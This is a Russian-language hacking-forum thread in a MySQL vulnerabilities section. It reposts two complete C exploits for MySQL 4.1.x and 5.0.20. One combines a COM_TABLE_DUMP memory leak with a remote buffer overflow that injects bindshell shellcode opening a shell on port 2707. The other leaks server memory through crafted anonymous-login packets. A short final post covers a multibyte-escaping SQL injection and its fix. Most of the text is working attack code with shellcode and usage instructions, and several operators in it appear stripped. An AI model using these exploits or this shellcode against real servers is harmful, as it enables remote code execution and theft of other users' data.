• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: MySQL

Отслеживать

RedDevil

CD-диск
Пользователь
Регистрация
30.04.2006
Сообщения
16
Реакции
0
MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit

Цель эксплоита: MySQL 4.1.18, 5.0.20

Описание уязвимости:
Переполнение буфера и раскрытие данных в MySQL

Воздействие эксплоита: Выполнение произвольного кода

Код: 
/* ****************************************************************
  
  April 21.st 2006
  
  my_exploit.c

  MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f
  
  MySql <= 5.0.20
  
  MySql COM_TABLE_DUMP Memory Leak 
  
  MySql <= 4.x.x
  
  copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)
  
  GPL 2.0
  ****************************************************************
  
  Disclaimer:

  In no event shall the author be liable for any damages 
  whatsoever arising out of or in connection with the use 
  or spread of this information. 
  Any use of this information is at the user\'s own risk.
  
  ****************************************************************
  
  compile with:
  gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c  -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o  my_exploit

  Then:

  my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]

  -H: this Help;
  -i: Information leak exploit (shows the content of MySql Server Memory)
  -x: shows c/s communication output in hexadecimal
  -t: hexadecimal table_list struct address (by default we try to find it automatically)
  -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)
  -u: mysql username (anonymous too;)
  -p: mysql userpass (if you need it)
  -s: the socket path if is a unix socket
  -h: hostname or IP address
  -P: port (default 3306)


  Example_1 - Memoryleak: my_exploit  -s socketpath -u username -i 

  Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468

  For memory leak:

  my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]]

  For the bindshell to port 2707
  my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] [-s socket|[-h hostname [-P port]]]

  then from another shell:
  nc 127.0.0.1 2707
  id
  uid=78(mysql) gid=78(mysql) groups=78(mysql)



*/

#include <stdio.h>
#include <mysql.h>
#include <unistd.h>



// we need to know the thread struct address pointer and the table_list.
// these are defaults, change them from command line.
int thd = 0x8b1b338;
int tbl = 0x8b3a880;

#define USOCK2 \"/tmp/mysql.sock\"

char addr_tdh[4];
char addr_tbl[4];
char addr_ret[4];

// constants to overwrite packet with addresses for table_list thread and our shell.
#define TBL_POS  182
#define THD_POS  178
#define RET_POS  174
#define SHL_POS  34

// bindshell spawns a shell with on port 2707
char shcode[] = {
  0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89    // 12
,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1
,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80
,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0
,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80
,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f
,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80    // 12*7= 84
};

int tmp_idx = 0;

int dump_packet_len = 7;
char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };

int payload_len = 371;
// header packet   select \'1234567890...etc\'
char query_payload[] = {
      0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33    // 16   Some junk from position 6 ...
    , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36    // 32
    , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39    // 48
    , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34    // 64
    , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32    // 72
    , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35    // 88
    , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38    // 94
    , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a    // 112
    , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3    // 128 endsh 118
    , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d    // 144
    , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63    // 160
    , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d    // 176
    , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75    // 192 178
    , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    // 208
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    // 224
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    // 240
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    // 256
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    // 272
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    // 288
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    //
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    //
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    //
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d    //
    , 0x3d, 0x3d, 0x27
};                // 16*23 3 = 371




static int s = 0, c = 0;
int fd = 0;
int d = 1;
int hexdump = 0;
char buf[65535];


MYSQL *conn;            /* pointer to connection handler */


int
sendit (char *buf1, int fdest, int dblen)
{
  int len1;
  int i = 0;
  int ret = 0;
  printf (\"%d\\n\", d);
  if (d == 2)
    {
      // let\'s prepare the query packet 
      int o;
      int position = 14;

      tmp_idx = 3;


      int ret = tbl - 0x106   33;

      for (i = 0; i < 32; i  = 8)
    addr_ret[tmp_idx--] = (ret >> i) & 0xff;

      tmp_idx = 3;
      for (i = 0; i < 32; i  = 8)
    addr_tdh[tmp_idx--] = (thd >> i) & 0xff;

      tmp_idx = 3;
      for (i = 0; i < 32; i  = 8)
    addr_tbl[tmp_idx--] = (tbl >> i) & 0xff;
      printf (\"ret %x\\n\", ret);


#if 1
      tmp_idx = 0;
      for (o = THD_POS; o > THD_POS - 4; o--)
    query_payload[o] = addr_tdh[tmp_idx  ];

      tmp_idx = 0;
      for (o = TBL_POS; o > TBL_POS - 4; o--)
    query_payload[o] = addr_tbl[tmp_idx  ];

      tmp_idx = 0;
      for (o = RET_POS; o > RET_POS - 4; o--)
    query_payload[o] = addr_ret[tmp_idx  ];
#else
      for (; position < payload_len - 12; position  = 12)
    {
      tmp_idx = 0;
      printf (\"p:%d\\n\", position);
      for (o = position   4; o > position; o--)
        query_payload[o] = addr_ret[tmp_idx  ];

      tmp_idx = 0;
      for (o = position   8; o > position   4; o--)
        query_payload[o] = addr_tdh[tmp_idx  ];

      tmp_idx = 0;
      for (o = position   12; o > position   8; o--)
        query_payload[o] = addr_tbl[tmp_idx  ];

    }

#endif

      tmp_idx = 0;
      for (o = SHL_POS; o < SHL_POS   84; o  )
    query_payload[o] = shcode[tmp_idx  ];

      printf (\"entro\\n\");
      buf1 = query_payload;
      len1 = payload_len;
    }
  else if (d >= 3)
    {
      printf (\"entro\\n\");

      // prepare table_dump request - PACK_LEN,  0x00,  0x00,  0x00,  COM_TABLE_DUMP (0x13),  DB_NAME_LEN (2) , RANDOM_CHAR (=0x73)
      buf1 = table_dump_packet;
      if (dblen >= 0)
    buf1[5] = (char) dblen;
      printf (\"%x\", (char) dblen);
      len1 = dump_packet_len;
    }
  d;

  printf (\"\\nClient -> Server\\n\");
  if (hexdump)
    {
      for (i = 0; i < len1; i  )
    printf (\" %.2x%c\", (unsigned char) buf1[i],
        ((i   1) % 16 ? \' \' : \'\\n\'));
      printf (\"\\n\");
      for (i = 0; i < len1; i  )
    {
      unsigned char f = (unsigned char) buf1[i];
      printf (\" %.2c,\", (isprint (f) ? f : \'.\'),
          (((i   1) % 16) ? \' \' : \'\\n\'));
    }
    }
  if (send (fd, buf1, len1, 0) != len1)
    {
      perror (\"cli: send(buf3)\");
      exit (1);
    }



  fdest = fd;

  memset (buf, 0, 65535);
  ret = recv (fdest, buf, 65535, 0);
  printf (\"\\nServer -> Client\\n\");
  if (hexdump)
    {
      for (i = 0; i < ret; i  )
    printf (\" %.2x%c\", (unsigned char) buf[i],
        ((i   1) % 16 ? \' \' : \'\\n\'));
      printf (\"\\n\");
      for (i = 0; i < ret; i  )
    {
      unsigned char f = (unsigned char) buf[i];
      printf (\" %.2c,\", (isprint (f) ? f : \'.\'),
          ((i   1) % 16 ? \' \' : \'\\n\'));
    }
    }
  else
    {
      printf (\"\\n%s\\n\", buf   5);
    }
// printf(\"\\nSending to client\\n\");
// ret= send(c, buf,  ret, 0);

  return 0;
}

usage ()
{
  printf
    (\"\\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\\n\\n\\
-H: this Help;\\n\\
-i: Information leak exploit (shows the content of MySql Server Memory)\\n\\
-x: shows c/s communication output in hexadecimal\\n\\
-t: hexadecimal table_list struct address (by default we try to find it automatically)\\n\\
-a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\\n\\
-u: mysql username (anonymous too;)\\n\\
-p: mysql userpass (if you need it)\\n\\
-s: the socket path if is a unix socket\\n\\
-h: hostname or IP address\\n\\
-P: port (default 3306)\\n\\n\\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\\n\\n\\
Example_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\\n\\n\\
\");

}

int
main (int argc, char *argv[])
{

  int fdest = 0;
  int port = 3306;
  int shell = 1;
  int force_table = 0;
  char buf1[65535];
  char *socket;
  char *user = NULL;
  char *pass = NULL;
  char *host = NULL;
  socket = strdup (\"/tmp/mysql2.sock\");
  opterr = 0;

  while ((c = getopt (argc, argv, \"s:t:a:P:Hh:u:p:ix\")) != -1)
    switch (c)
      {
      case \'s\':
    socket = (char *) optarg;
    break;
      case \'t\':
    force_table = 1;
    tbl = (int) strtol (optarg, NULL, 16);
    //tbl=atoi(  optarg );
    break;
      case \'a\':
    thd = (int) strtol (optarg, NULL, 16);
    break;
      case \'u\':
    user = (char *) optarg;
    break;
      case \'p\':
    pass = (char *) optarg;
    break;
      case \'P\':
    port = atoi (optarg);
    break;
      case \'h\':
    host = (char *) optarg;
    break;
      case \'i\':
    shell = 0;
    break;
      case \'x\':
    hexdump = 1;
    break;
      case \'H\':
    usage ();
    return 1;
      default:
    break;
      }

  if (!force_table)
    tbl = thd   0x1f548;
  conn = mysql_init (NULL);
  int ret = mysql_real_connect (conn,    /* pointer to connection handler */
                host,    /* host to connect to */
                user,    /* user name */
                pass,    /* password */
                NULL,    /* database to use */
                0,    /* port (use default) */
                socket,    /* socket (use default) */
                0);    /* flags (none) */

  if (!ret)
    {
      fprintf (stderr, \"Can\'t connect, error : %s\\n\", mysql_error (conn));
      return 1;
    }
  printf (\"using table_list:%x  thread:%x\\n\", tbl, thd);

  fd = conn->net.fd;

  if (shell)
    {
      d = 2;
      sendit (buf1, fdest, -1);
      d = 3;
      sendit (buf1, fdest, -1);
      d = 3;
      sendit (buf1, fdest, -1);
    }
  else
    {
      int l;
      d = 3;
      for (l = 0; l < 256; l  )
    {
      sendit (buf1, fdest, l);
    }
    }
  mysql_close (conn);

  exit (0);
}
Добавлено в [time]1146637091[/time]
MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploi

Программа:
MySQL 4.1.18, и более ранние версии.
MySQL 5.0.20

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе.

Уязвимость существует при обработке имени анонимного пользователя (пользователя с пустым паролем) в процессе аутентификации. Удаленный пользователь может послать серверу специально сформированный пакет и получить доступ к важным данным на системе (к частям запросов или результатам их выполнения другими пользователями).

Код: 
/* ****************************************************************
  
  April 21.st 2006
  
  my_anon_db_leak.c

  MySql Anonimous Login Memory Leak 
  
  MySql <= 5.0.20
  
  MySql <= 4.1.x
  
  copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)
  
  GPL 2.0
  ****************************************************************
  
  Disclaimer:

  In no event shall the author be liable for any damages 
  whatsoever arising out of or in connection with the use 
  or spread of this information. 
  Any use of this information is at the user's own risk.
  
  ****************************************************************
  Compile with:
  gcc my_anon_db_leak.c -o my_anon_db_leak
  
  usage:
  my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len]
  
  
*/


#include <sys/types.h>
/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2
have MSG_WAITALL in its <socketbits.h> ??
*/

#ifdef __linux__
#include <linux/socket.h>
#else
#include <sys/socket.h>
#endif
#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/file.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>        /* sockaddr_in{} and other Internet defns */
#include <netdb.h>        /* needed by gethostbyname */
#include <arpa/inet.h>        /* needed by inet_ntoa */


char anon_pckt[] = {
  0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0xdb, 0x54, 0xb6, 0x6a,
  0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d, 0xad, 0x45, 0x73,
  0x00
};                // len=16*4 1=65;


int anon_pckt_len = 65;

#define USOCK "/tmp/mysql2.sock"

int
tcp_conn (char *hostname, int port)
{

  int sockfd;
  int n;
  struct sockaddr_in servaddr;

  struct hostent *hp;



  if ((hp = gethostbyname (hostname)) == 0)
    {
      perror ("gethostbyname");
      exit (0);
    }

  if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
    {
      perror ("socket");
      exit (1);
    }

  bzero ((char *) &servaddr, sizeof (servaddr));
  servaddr.sin_family = AF_INET;
  servaddr.sin_port = htons (port);

  memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length);
  if (servaddr.sin_addr.s_addr <= 0)
    {
      perror ("bad address after gethostbyname");
      exit (1);
    }
  if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0)
    {
      perror ("connect");
      exit (1);
    }
  return sockfd;
}

int
unix_conn (char *path)
{
  int fd, len;
  struct sockaddr_un sa;

  fd = socket (PF_UNIX, SOCK_STREAM, 0);

  if (fd < 0)
    {
      perror ("cli: socket(PF_UNIX,SOCK_STREAM)");
      exit (1);
    }

  sa.sun_family = AF_UNIX;
  strcpy (sa.sun_path, path);
  len = sizeof (sa);
  if (connect (fd, (struct sockaddr *) &sa, len) < 0)
    {
      perror ("cli: connect()");
      exit (1);
    }
  return fd;
}

int
main (int argc, char *argv[])
{
  int fd;
  int i, ret;
  char packet[65535];
  char *path;
  char *host;
  int port = 3306;
  char buf[65535];
  int db_len = 0;
  int pckt_len = anon_pckt_len;
  int unix_sock = 1;
  char c;

  path = strdup (USOCK);
  host = strdup ("127.0.0.1");

  opterr = 0;

  while ((c = getopt (argc, argv, "s:h:p:n:")) != -1)
    switch (c)
      {
      case 's':
    path = strdup (optarg);
    unix_sock = 1;
    break;
      case 'h':
    host = strdup (optarg);
    unix_sock = 0;
    break;
      case 'p':
    port = atoi (optarg);
    unix_sock = 0;
    break;
      case 'n':
    db_len = atoi (optarg);
    break;

      default:
    break;
      }


  bzero (packet, 65535);

  pckt_len = anon_pckt_len   db_len;
  printf ("%d\n", pckt_len);

  for (i = 0; i < pckt_len; i  )
    packet[i] = anon_pckt[i];

  if (db_len)
    for (i = anon_pckt_len - 2; i < pckt_len; i  )
      packet[i] = 'A';

  packet[pckt_len - 1] = '\';

  packet[0] = (char) (anon_pckt[0]   db_len) & 0xff;
  packet[1] = (char) ((anon_pckt[0]   db_len) >> 8) & 0xff;
  for (i = 0; i < pckt_len; i  )
    printf (" %.2x%c", (unsigned char) packet[i],
        ((i   1) % 16 ? ' ' : '\n'));
  printf ("\n");


  if (unix_sock)
    fd = unix_conn (path);
  else
    fd = tcp_conn (host, port);

  sleep (1);
  ret = recv (fd, buf, 65535, 0);
  if (send (fd, packet, pckt_len, 0) != pckt_len)
    {
      perror ("cli: send(anon_pckt)");
      exit (1);
    }

  ret = recv (fd, buf, 65535, 0);
  for (i = 0; i < ret; i  )
    printf ("%c", (isalpha (buf[i]) ? buf[i] : '.'));
  printf ("\n");
  return 0;
}
 
MySQL 5.0.22 и 4.0.20
В MySQL была найдена уязвимость, которая позволяет производить SQL-injection при передаче escape последовательности "\'". PHP-функции mysql_real_escape() и mysql_real_escape() не в состоянии предотвратить SQL-injection при обработке мультибайтовых кодировок (например, UTF-8).

Новую версию MySQL (5.0.22 и 4.0.20) можно скачать на их сайте:
http://dev.mysql.com/downloads/

Если вы пока не хотите обновлять MySQL-сервер, то должны выполнить на нем следующую команду:

Код: 
SET GLOBAL sql_mode='NO_BACKSLASH_ESCAPES';
[New$paN]
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх